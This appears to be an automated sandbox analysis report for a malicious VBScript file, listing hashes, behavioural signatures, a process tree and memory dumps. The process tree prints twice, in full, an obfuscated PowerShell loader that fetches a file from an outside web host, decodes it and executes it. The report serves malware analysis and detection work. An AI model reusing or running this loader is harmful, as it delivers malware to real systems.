Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

1afa97a4a2...16.vbs

windows7-x64

8

1afa97a4a2...16.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    91s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/02/2024, 01:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1afa97a4a2c1d6bae74b4b76298b85de076a084bcee539b9503a3d4bd1d13016.vbs

  • Size

    27KB

  • MD5

    7dfd8643db03575d693bc1b869db804d

  • SHA1

    f4ac1dba10c97ea3d73ca06655bb59d12b6dda90

  • SHA256

    1afa97a4a2c1d6bae74b4b76298b85de076a084bcee539b9503a3d4bd1d13016

  • SHA512

    723acd7a90ae8ef21b581c950781067f48200e244531ce276f0c48c955d88a25b618b8ec07de0e3e8e719e7556186c63fd46cb5a22d430cc090d46d98a722f01

  • SSDEEP

    384:4TFS6TUL9BSzLsMUNQZK235QSKpZZnvggiQi1PLltwGRKCst:4Tg6T09B48NQZV35gyQipLlzRKR

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1afa97a4a2c1d6bae74b4b76298b85de076a084bcee539b9503a3d4bd1d13016.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "gal;gal;gal;gal;gal;gal;gal;gal;gal;Function Quacksalver9 ($Trediveren135){$Recurrer = $Trediveren135.Length-1; For ($Autistiske=4; $Autistiske -lt $Recurrer){$Dispensere=$Dispensere+$Trediveren135.Substring( $Autistiske, 1);$Autistiske+=5;}$Dispensere;}$Vectis=Quacksalver9 'UnpohSupetPulstSolbpquinsComp:Kuns/ Skn/sergbDatarHullo ProdHexabRegieKrigcProvkSnekcRbesoTikanMellsstyluAprilPhastQuadiPassnchitgRuff.CouncNutloMethmPira/ NavwVoldpMole-Palmc SeloPartnNonctGenreHensnSkygtIrre/FodbFEskoi ZarlPersmFusicCasteFyldnConssUdslu VerrSemieFlamrtuppnUndeeUndisBagg. AnspUnstn BlogZard ';$Dispensere01=Quacksalver9 'LedeiUnwee BulxUncl ';$Matchings = Quacksalver9 'Teks\OutlsStudy GifsFluewSynso SpowSoix6Line4Popu\ TenWSnariNephnParadTilsoGresw BoesStjePUpbooProgwRivae Ensr AntSOrdlhSummeDecal Tral Rnn\FuldvKalk1Fors.Gide0unde\IntepjubioKapiwsygeeSkkerOestsSendhBorte TinlSexllArbe. Bale UndxFixeeBiza ';&($Dispensere01) (Quacksalver9 'Dial$ AirFOnloi ScalSammuKalar Byr2Rend=Fofa$KulteHushnParavTeks: Prvw Meti Kirn TandGloxiTongrStra ') ;&($Dispensere01) (Quacksalver9 'Nonc$MiliMImpraUrprtAmzecBallhVelfiEnwrnViolgBismsChar=Unte$RavkFAdjuiKontlUnwruGaddrPube2 cam+ Rav$EngaM ChaaReatt MatcUnwhh GloiGrovnSkovgBjrnsSkat ') ;&($Dispensere01) (Quacksalver9 'Scoo$GennDGiftdFores GemasausaMisorhfteeTempnAnkleMuklsCale Pref=Over Antr(Dalt(GrosgRkebwSkolmHypeiOpti Doraw SkuiAnninlyst3Outh2Pode_Udmup TrorSkrioGushc Hyle RetsBaggsafle Vand-FeraF The HjnsPUnnerNavnoIntucMarmeinklsReals BruIHavndAmpu=Orga$Omre{anodPSlutIOverDPahl}Test)Gast.KvilC ToooCasumSkatm WelaUfulnSolidFrekLLysoiRaamnNytteOpmu) Art Mant-naphsPyropcytilBraniUnextKebs Rene[TrancSammhOntoatighrklan]Brem3arbe4obli ');&($Dispensere01) (Quacksalver9 'Sper$ RecF StaoinsirPseus IshtUnasu PoidGradiLunce Chlt Fuz Over=Wolf Lenv$ReciDOmendNetvsUnfraKnuba WinrPlacemaisnPrcieCacosGuar[Etag$RiddDWangdBailsHensa HamaskosrBilleRgelnFelteTabusDona.Boerc SnooOdesuTegsn TartSerr- Sta2Papm]Cact ');&($Dispensere01) (Quacksalver9 ' Mar$IndsDSyrojFotueThorlOverl TraaudsobBalzaIlbuhMass=Eiri(SkriTWildeGenbsMudmtWito-SilePAblaaKdektIndahBeth Lech$careMIodhaUrokt HoacFrethUndeiRedun egogUnsysfuld)Slav Dun-UndeABlomnSydddConc Optr( cai[ArraIOvernSavftDiscPUncotUnmar Dam]Ende: Ska: UsmsDenti KolzSpene Ove Rad-Prore ForqCoed Stan8Pros) ekl ') ;if ($Djellabah) {&$Matchings $Forstudiet;} else {;$Dispensere00=Quacksalver9 ' ErhSFototHjsdaTeler TektSkrd- DitBDagbiFilttAracs UpaTBivurFyrkaPostnlancsFamif BeseAfgarfork Suf-jozeSUnicoFahruRullrWilmcWelseLede Andr$BromVMatee barcIndetZephiAktisKult Vgti-ShibDnacre DemsUncltSomeiStrun SchaAcictHipliPaneoHardnUdva Domk$VgteFFamiigopalDjveu Invrunde2Idle ';&($Dispensere01) (Quacksalver9 'grun$BrusF Heai Subl KnkuOrthrSigm2Soci=Redd$Arboe GumnWirevHalv:Media Funpindgp AurdStruaManntBestaJord ') ;&($Dispensere01) (Quacksalver9 ' SymIOvermInvep SnooBrevr Nomtblge- GroMFridoMotidBureuCholl Unte Lof SelBUnsqiMagitRosasilocTRindrabunaTolenAfgisDriffrdsteMucarIndf ') ;$Filur2=$Filur2+'\Aculea176.Ary';while (-not $Breakability) {&($Dispensere01) (Quacksalver9 ' Sko$EvelB ResrdisteInstaPeiskMillaDrukbZeugiTanal TeliBotatDosiyEspa= Eks(AksiTInveeFastsFinttgala-BlodPMulaaBrnet LanhWire Snor$ProlFHektiBronlKolduvintrZulu2Demi) car ') ;&($Dispensere01) $Dispensere00;&($Dispensere01) (Quacksalver9 ' NonSRegntBeniaMetyr Bant Pri-UnanSFavolDynaeMarieReddpDish Vrdi5 Iar ');}&($Dispensere01) (Quacksalver9 'Unre$DataQEvenuOvera ForcGlotkBlubs Fusa IndlApetvKammeNonorEksp Kamm=Miss NeglGTreaehovetepil-UensC VaroSammnTilstKhade Vomn udstBldn Stor$toksFPseuiBragl RouuUpsor Men2Daup ');&($Dispensere01) (Quacksalver9 ' Ant$ferrASalpdIrremNoniiFhvrr Groa Unnl thisVelatSlusabrndb saleAndasDisg Rari= Gru back[vennSHoldySemisStantEpipeIndrmFarv.OptiCBarsoAfsknFinvvSulke AldrFraftElaf]Mete:Meld:DibuF ColrQuisoMobimSikkBRedoaAdensKonfeSvig6Mode4 AktSForstComir HeaitrannNervgMega(Sala$NonpQRippuCarba SkucTegnkCatasPrenaTornlArkfvNonneSektrPter)tian ');&($Dispensere01) (Quacksalver9 'Inve$overD DumiSiegsIndvpSkrde SygnDampsAssoe RekrklaneTrin2Over Tole=Fdse Punc[HypoSCharyForusdemotOopheTampmrkeb.EvviTKaveeWestx TertLiba.VejlE Parn Wigcprivo AmmdSpiliBaannGeotgDisp]Komp: Rep:DebuAValoSAnalCLainIHypeIhagu.harbGAvene SubtquesSRavit EndrSkylihjbenkontgSuns(Unde$FartAScandDryfm BysiHalsrAnsiaRegelSorts veltRancaIngobfataemilisplan) Obs ');&($Dispensere01) (Quacksalver9 'Bryn$idioU Udln Burb DomeIrriaHvisv PineTrolrLandeDrrudMaka=Refo$BrtsDDesiiCarnsTrappSelee ConndecosNovieVandrUnsteUncr2Usgs.PedasTraiuNedsbFunksForltPatrrParaiIrvin CatgBoos(Fees3Cros0Tele1Fors3Buss2Rhiz8Fedd,Indb2Stra5Cyto7Unfr4Lixe4Grup)Hand ');&($Dispensere01) $Unbeavered;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5100
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "gal;gal;gal;gal;gal;gal;gal;gal;gal;Function Quacksalver9 ($Trediveren135){$Recurrer = $Trediveren135.Length-1; For ($Autistiske=4; $Autistiske -lt $Recurrer){$Dispensere=$Dispensere+$Trediveren135.Substring( $Autistiske, 1);$Autistiske+=5;}$Dispensere;}$Vectis=Quacksalver9 'UnpohSupetPulstSolbpquinsComp:Kuns/ Skn/sergbDatarHullo ProdHexabRegieKrigcProvkSnekcRbesoTikanMellsstyluAprilPhastQuadiPassnchitgRuff.CouncNutloMethmPira/ NavwVoldpMole-Palmc SeloPartnNonctGenreHensnSkygtIrre/FodbFEskoi ZarlPersmFusicCasteFyldnConssUdslu VerrSemieFlamrtuppnUndeeUndisBagg. AnspUnstn BlogZard ';$Dispensere01=Quacksalver9 'LedeiUnwee BulxUncl ';$Matchings = Quacksalver9 'Teks\OutlsStudy GifsFluewSynso SpowSoix6Line4Popu\ TenWSnariNephnParadTilsoGresw BoesStjePUpbooProgwRivae Ensr AntSOrdlhSummeDecal Tral Rnn\FuldvKalk1Fors.Gide0unde\IntepjubioKapiwsygeeSkkerOestsSendhBorte TinlSexllArbe. Bale UndxFixeeBiza ';&($Dispensere01) (Quacksalver9 'Dial$ AirFOnloi ScalSammuKalar Byr2Rend=Fofa$KulteHushnParavTeks: Prvw Meti Kirn TandGloxiTongrStra ') ;&($Dispensere01) (Quacksalver9 'Nonc$MiliMImpraUrprtAmzecBallhVelfiEnwrnViolgBismsChar=Unte$RavkFAdjuiKontlUnwruGaddrPube2 cam+ Rav$EngaM ChaaReatt MatcUnwhh GloiGrovnSkovgBjrnsSkat ') ;&($Dispensere01) (Quacksalver9 'Scoo$GennDGiftdFores GemasausaMisorhfteeTempnAnkleMuklsCale Pref=Over Antr(Dalt(GrosgRkebwSkolmHypeiOpti Doraw SkuiAnninlyst3Outh2Pode_Udmup TrorSkrioGushc Hyle RetsBaggsafle Vand-FeraF The HjnsPUnnerNavnoIntucMarmeinklsReals BruIHavndAmpu=Orga$Omre{anodPSlutIOverDPahl}Test)Gast.KvilC ToooCasumSkatm WelaUfulnSolidFrekLLysoiRaamnNytteOpmu) Art Mant-naphsPyropcytilBraniUnextKebs Rene[TrancSammhOntoatighrklan]Brem3arbe4obli ');&($Dispensere01) (Quacksalver9 'Sper$ RecF StaoinsirPseus IshtUnasu PoidGradiLunce Chlt Fuz Over=Wolf Lenv$ReciDOmendNetvsUnfraKnuba WinrPlacemaisnPrcieCacosGuar[Etag$RiddDWangdBailsHensa HamaskosrBilleRgelnFelteTabusDona.Boerc SnooOdesuTegsn TartSerr- Sta2Papm]Cact ');&($Dispensere01) (Quacksalver9 ' Mar$IndsDSyrojFotueThorlOverl TraaudsobBalzaIlbuhMass=Eiri(SkriTWildeGenbsMudmtWito-SilePAblaaKdektIndahBeth Lech$careMIodhaUrokt HoacFrethUndeiRedun egogUnsysfuld)Slav Dun-UndeABlomnSydddConc Optr( cai[ArraIOvernSavftDiscPUncotUnmar Dam]Ende: Ska: UsmsDenti KolzSpene Ove Rad-Prore ForqCoed Stan8Pros) ekl ') ;if ($Djellabah) {&$Matchings $Forstudiet;} else {;$Dispensere00=Quacksalver9 ' ErhSFototHjsdaTeler TektSkrd- DitBDagbiFilttAracs UpaTBivurFyrkaPostnlancsFamif BeseAfgarfork Suf-jozeSUnicoFahruRullrWilmcWelseLede Andr$BromVMatee barcIndetZephiAktisKult Vgti-ShibDnacre DemsUncltSomeiStrun SchaAcictHipliPaneoHardnUdva Domk$VgteFFamiigopalDjveu Invrunde2Idle ';&($Dispensere01) (Quacksalver9 'grun$BrusF Heai Subl KnkuOrthrSigm2Soci=Redd$Arboe GumnWirevHalv:Media Funpindgp AurdStruaManntBestaJord ') ;&($Dispensere01) (Quacksalver9 ' SymIOvermInvep SnooBrevr Nomtblge- GroMFridoMotidBureuCholl Unte Lof SelBUnsqiMagitRosasilocTRindrabunaTolenAfgisDriffrdsteMucarIndf ') ;$Filur2=$Filur2+'\Aculea176.Ary';while (-not $Breakability) {&($Dispensere01) (Quacksalver9 ' Sko$EvelB ResrdisteInstaPeiskMillaDrukbZeugiTanal TeliBotatDosiyEspa= Eks(AksiTInveeFastsFinttgala-BlodPMulaaBrnet LanhWire Snor$ProlFHektiBronlKolduvintrZulu2Demi) car ') ;&($Dispensere01) $Dispensere00;&($Dispensere01) (Quacksalver9 ' NonSRegntBeniaMetyr Bant Pri-UnanSFavolDynaeMarieReddpDish Vrdi5 Iar ');}&($Dispensere01) (Quacksalver9 'Unre$DataQEvenuOvera ForcGlotkBlubs Fusa IndlApetvKammeNonorEksp Kamm=Miss NeglGTreaehovetepil-UensC VaroSammnTilstKhade Vomn udstBldn Stor$toksFPseuiBragl RouuUpsor Men2Daup ');&($Dispensere01) (Quacksalver9 ' Ant$ferrASalpdIrremNoniiFhvrr Groa Unnl thisVelatSlusabrndb saleAndasDisg Rari= Gru back[vennSHoldySemisStantEpipeIndrmFarv.OptiCBarsoAfsknFinvvSulke AldrFraftElaf]Mete:Meld:DibuF ColrQuisoMobimSikkBRedoaAdensKonfeSvig6Mode4 AktSForstComir HeaitrannNervgMega(Sala$NonpQRippuCarba SkucTegnkCatasPrenaTornlArkfvNonneSektrPter)tian ');&($Dispensere01) (Quacksalver9 'Inve$overD DumiSiegsIndvpSkrde SygnDampsAssoe RekrklaneTrin2Over Tole=Fdse Punc[HypoSCharyForusdemotOopheTampmrkeb.EvviTKaveeWestx TertLiba.VejlE Parn Wigcprivo AmmdSpiliBaannGeotgDisp]Komp: Rep:DebuAValoSAnalCLainIHypeIhagu.harbGAvene SubtquesSRavit EndrSkylihjbenkontgSuns(Unde$FartAScandDryfm BysiHalsrAnsiaRegelSorts veltRancaIngobfataemilisplan) Obs ');&($Dispensere01) (Quacksalver9 'Bryn$idioU Udln Burb DomeIrriaHvisv PineTrolrLandeDrrudMaka=Refo$BrtsDDesiiCarnsTrappSelee ConndecosNovieVandrUnsteUncr2Usgs.PedasTraiuNedsbFunksForltPatrrParaiIrvin CatgBoos(Fees3Cros0Tele1Fors3Buss2Rhiz8Fedd,Indb2Stra5Cyto7Unfr4Lixe4Grup)Hand ');&($Dispensere01) $Unbeavered;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2456
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 2856
          4⤵
          • Program crash
          PID:2888
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2456 -ip 2456
    1⤵
      PID:2668

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q1yrojo5.at3.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/2456-25-0x0000000005E80000-0x0000000005EE6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2456-43-0x0000000007BA0000-0x0000000007BC2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2456-45-0x0000000074BD0000-0x0000000075380000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2456-44-0x0000000007C30000-0x0000000007C44000-memory.dmp

      Filesize

      80KB

      Download

    • memory/2456-35-0x0000000005F70000-0x00000000062C4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2456-18-0x0000000005000000-0x0000000005036000-memory.dmp

      Filesize

      216KB

      Download

    • memory/2456-19-0x0000000074BD0000-0x0000000075380000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2456-20-0x0000000005040000-0x0000000005050000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2456-21-0x0000000005040000-0x0000000005050000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2456-22-0x0000000005680000-0x0000000005CA8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/2456-23-0x0000000005D00000-0x0000000005D22000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2456-41-0x00000000077B0000-0x00000000077D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2456-42-0x0000000008570000-0x0000000008B14000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2456-36-0x00000000065A0000-0x00000000065BE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2456-24-0x0000000005DA0000-0x0000000005E06000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2456-37-0x00000000065E0000-0x000000000662C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2456-38-0x0000000007EF0000-0x000000000856A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/2456-39-0x0000000006AC0000-0x0000000006ADA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2456-40-0x0000000007870000-0x0000000007906000-memory.dmp

      Filesize

      600KB

      Download

    • memory/5100-14-0x00007FF819410000-0x00007FF819ED1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5100-9-0x000002E8B0980000-0x000002E8B09A2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5100-17-0x000002E8B09C0000-0x000002E8B09D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5100-16-0x000002E8B09C0000-0x000002E8B09D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/5100-48-0x00007FF819410000-0x00007FF819ED1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/5100-15-0x000002E8B09C0000-0x000002E8B09D0000-memory.dmp

      Filesize

      64KB

      Download